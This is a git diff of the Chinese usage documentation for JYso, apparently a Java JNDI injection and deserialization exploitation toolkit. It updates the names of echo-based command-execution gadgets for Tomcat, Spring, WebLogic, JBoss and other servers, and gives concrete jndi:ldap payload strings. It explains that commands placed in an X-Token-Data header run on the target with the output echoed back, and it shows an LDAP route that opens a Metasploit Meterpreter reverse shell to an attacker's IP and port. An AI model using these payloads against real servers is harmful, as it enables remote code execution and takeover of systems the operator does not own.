diff --git a/JYso‐CN.md b/JYso‐CN.md index 9914689..f6bd902 100644 --- a/JYso‐CN.md +++ b/JYso‐CN.md @@ -144,26 +144,31 @@ ldap://127.0.0.1:1389/[Basic or TomcatBypass]/command/Base64/[base64_encoded_cmd ## 1.2 Echo使用 -- 命令 `EX-AllEcho`:DFS 找 Request 命令执行回显 -- 命令 `EX-TomcatEcho`:Tomcat 命令执行回显 -- 命令 `EX-SpringEcho`:Spring 命令执行回显 -- 命令 `EX-JbossEcho`:Jboss 命令执行回显 -- 命令 `EX-jettyEcho`:Jetty 命令执行回显 -- 命令 `EX-LinuxEcho1`:Linux 命令执行回显 -- 命令 `EX-LinuxEcho2`:Linux 命令执行回显 -- 命令 `EX-resinEcho`:Resin 命令执行回显 -- 命令 `EX-weblogicEcho`:Weblogic 命令执行回显 -- 命令 `EX-WindowsEcho`:Windows 命令执行回显 -- 命令 `EX-ResinEcho`:Resin 命令执行回显 -- 命令 `EX-WebsphereEcho`:websphere 命令执行回显 +- 命令 `AllEcho`:DFS 找 Request 命令执行回显 +- 命令 `TomcatEcho`:Tomcat 命令执行回显 +- 命令 `SpringEcho`:Spring 命令执行回显 +- 命令 `JbossEcho`:Jboss 命令执行回显 +- 命令 `jettyEcho`:Jetty 命令执行回显 +- 命令 `LinuxEcho1`:Linux 命令执行回显 +- 命令 `LinuxEcho2`:Linux 命令执行回显 +- 命令 `resinEcho`:Resin 命令执行回显 +- 命令 `weblogicEcho`:Weblogic 命令执行回显 +- 命令 `WindowsEcho`:Windows 命令执行回显 +- 命令 `ResinEcho`:Resin 命令执行回显 +- 命令 `WebsphereEcho`:websphere 命令执行回显 对于 Echo 类的回显,是基于在线程组中找到带有指定 Header 头部的请求、执行命令并回显的利用方式。 使用时在 Header 中加入 `X-Token-Data` ,其值为待执行的命令,命令执行结果将回显在 response 中。 + JNDI-Injection-Exploit 用法: ++ 不需要参数时 ``` -jndi:ldap://127.0.0.1:1389/[Basic or TomcatBypass]/[E-EchoClass] +jndi:ldap://127.0.0.1:1389/TomcatBypass/E-TomcatEcho +``` ++ 需要参数时 +``` +jndi:ldap://127.0.0.1:1389/TomcatBypass/M-EX-TomcatEcho/shell/-ch Cookiess ``` + ysoserial @@ -178,7 +183,7 @@ jndi:ldap://127.0.0.1:1389/[Basic or TomcatBypass]/[E-EchoClass] - 支持tomcatBypass路由直接上线msf: - 使用msf的java/meterpreter/reverse_tcp开启监听 ``` -ldap://127.0.0.1:1389/[Basic or TomcatBypass]/E-Meterpreter/msf/[msf_ip]/[msf_port] +ldap://127.0.0.1:1389/TomcatBypass/E-Meterpreter/msf/[msf_ip]/[msf_port] ``` ---